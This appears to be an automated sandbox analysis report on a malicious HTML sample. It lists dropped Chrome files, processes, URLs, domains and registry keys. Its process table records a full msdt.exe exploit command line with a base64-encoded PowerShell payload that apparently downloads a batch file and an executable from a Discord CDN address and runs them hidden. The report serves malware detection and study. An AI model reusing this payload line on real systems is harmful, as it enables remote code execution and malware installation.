Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
33Gxzxafa9.html
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\017b6f3b-91b8-4cf3-8e81-6997184f9ebb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\0ec80ed4-39e3-4d69-a3c2-37d7926d9d67.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\18f99cb2-9d7b-4801-955d-442a64081ee2.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\29c8fb44-81cf-4b13-9e25-c0a3d5ac6157.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\2a2ea352-3344-4f43-b8ee-41a789b9f6a8.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\61657e94-bbc6-4a57-90fd-6e36438114f4.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\7a9b5c98-6045-4431-8186-9c02df047efc.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\00b834f4-0d1a-4411-b651-07067371105d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0a979c95-8146-4225-b408-b0108a97cb25.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1fc3f0e0-f28f-4ce8-8ea7-aeec34f34dba.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\27521d7b-8861-4549-a57a-bb6f4d76ba7c.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3a868744-0a4b-4275-ac8e-9f4eccb17373.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\76fb1162-d997-4745-b374-dc485999537d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\807a86cf-ef42-42a5-a6db-d9c2a818737d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\2f528aa7-27c3-4e3a-8cb3-b87c9548c0b2.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\58da36b6-bf6a-4286-b953-1efbfd7bd804.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\aabc6288-4c85-4d4f-b387-ef182a569fc0.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b98acfe3-a320-4455-b066-c79e73098bc9.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cd5f0ebf-ea60-409a-8036-340a0d483828.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir7016_1436763028\Ruleset
Data
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\bad30bc1-9683-44f8-a290-5a38eb37868c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\d6e78302-b702-4062-9da4-75381acd10b8.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\decfdf93-0da3-4fe5-845c-3ec979e605eb.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e314977d-e07c-44f6-b806-3c1a629f2068.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e6c9c826-0b0a-48c6-8c4a-4e7c2fbb0c60.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e8600cdc-a745-48fb-9964-e7ac48be027f.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e9eabedc-df15-4def-b388-a15d52bce46a.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1183870152\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1183870152\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1183870152\crl-set
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1183870152\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1183870152\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_1668759403\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_239256582\Filtering Rules
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_239256582\LICENSE.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_239256582\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_239256582\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\7016_239256582\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f5813411-76a7-4a24-9cfb-7ea6e0a83b1a.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\fd547491-5147-4309-a797-a3aea52ab0fc.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir7016_295233384\f5813411-76a7-4a24-9cfb-7ea6e0a83b1a.tmp
|
Google Chrome extension, version 3
|
dropped
|
There are 119 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\33Gxzxafa9.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,8570997217961440861,13537868578887251489,131072
--lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1960 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg2NDg0NTE1OTg1ODI1Nzk1Lzk4NjQ5NTczMzI5NTM3NDM2Ni9jZC5iYXQgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xjZC5iYXQgOyBTdGFydC1Qcm9jZXNzICAtV2luZG93U3R5bGUgSGlkZGVuICdDOlxXaW5kb3dzXFRhc2tzXGNkLmJhdCcgOyBJbnZva2UtV2ViUmVxdWVzdCBodHRwczovL2Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50cy85ODY0ODQ1MTU5ODU4MjU3OTUvOTg2NDg0NjU5MzYzOTMwMTIyL1dvcmQuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcV29yZC5leGU7IEM6XFdpbmRvd3NcVGFza3NcV29yZC5leGUgOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
216.58.215.238
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
142.250.203.109
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://easylist.to/)
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://creativecommons.org/compatiblelicenses
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://github.com/easylist)
|
unknown
|
||
|
https://creativecommons.org/.
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
142.250.203.109
|
||
|
clients.l.google.com
|
216.58.215.238
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
216.58.215.238
|
clients.l.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
142.250.203.109
|
accounts.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
